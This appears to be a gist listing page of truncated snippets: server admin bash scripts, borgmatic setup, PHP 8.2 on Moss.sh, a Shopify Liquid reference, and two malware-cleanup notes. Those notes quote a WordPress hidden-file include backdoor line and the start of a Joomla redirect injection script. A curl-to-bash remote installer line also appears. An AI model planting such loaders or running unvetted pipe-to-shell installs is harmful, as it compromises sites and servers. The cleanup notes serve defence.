mrl22

#!/bin/bash

# Loop through user directories in /home/
for user_dir in /home/*; do
    if [ -d "$user_dir" ]; then
        user=$(basename "$user_dir")  # Extract the username from the path
        # Check if there is a Borg repo
        if [ -f "$user_dir/repo/transactions" ]; then
            usage=$(du -sh "$user_dir/repo" | cut -f1)
            echo -n "Compacting $user ($usage) ... "

mrl22

#!/bin/bash

# Run repquota and filter the output to get user and space usage information
repquota_output=$(repquota -a | grep ' -- ' | grep -vE 'man |_apt |systemd-|pollinate |syslog |tss |landscape |fwupd-')

# Sort the output by block usage (column 3) in reverse numeric order
sorted_output=$(echo "$repquota_output" | awk '/^[a-zA-Z0-9]/ {print $1 " " $3}' | sort -k2,2nr)

# Function to convert kilobytes to human-readable format
kilobytes_to_human() {

mrl22

#!/bin/bash

RED="\e[31m"
GREEN="\e[32m"
ENDC="\e[0m"

# Threshold for 48 hours in seconds
threshold=$(( 48 * 3600 ))

# Loop through user directories in /home/

mrl22

#!/bin/bash
# ------------------------------------------------------------------
# Am i Root user?
if [ $(id -u) -eq 0 ]; then
        read -p "Enter username : " username
        egrep "^$username" /etc/passwd >/dev/null
        if [ $? -eq 0 ]; then
                echo "$username exists!"
                exit 1
        else

mrl22

apt update

apt install python3-pip borgbackup

pip3 install --user --upgrade borgmatic

pip3 install --upgrade requests

mrl22

Do not copy and paste this code, it requires changes

Other PHP versions available here: https://gist.github.com/search?q=user%3Amrl22+moss

As of writing this, Moss.sh does not support PHP 8.2 via the control panel even though Ubuntu does.

Set up your website using Moss.sh and select Apache with PHP 7.4.

Once complete, we need to install PHP 8.2 with all the packages moss installs for 7.4.

mrl22

I found this webpage useful to start with: https://www.getastra.com/blog/911/joomla-malicious-redirects/

My next step was to see if I can get the source code for the redirect happening. I used https://www.view-page-source.com/ to get the source code anonymously hoping it would trigger and it did!

The malware injected the following into the head:

<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");

mrl22

if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { 
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); 
}

You are probably here because you Google'd the above PHP code.

I searched Google, but couldn't find a working solution, so I wrote one!

mrl22

Shopify objects that contain attributes that can be dynamically put on the page. For example, the product object contains an attribute called title that can be used to output the title of a product.

The handle is used to access the attributes of a Liquid object. By default, it is the object’s title in lowercase with any spaces and special characters replaced by hyphens (-). Every object in Liquid (product, collection, blog, menu) has a handle.

Collections & Products
Collection ►
all_types ►
Returns a list of all the product types for a collection

mrl22

curl -s https://urlto/install.sh | INSTALL_PUBLIC_KEY="ssh-rsa AAAAB3Nzwhatever mrl22@sfsdfsdfsdfsdf" bash -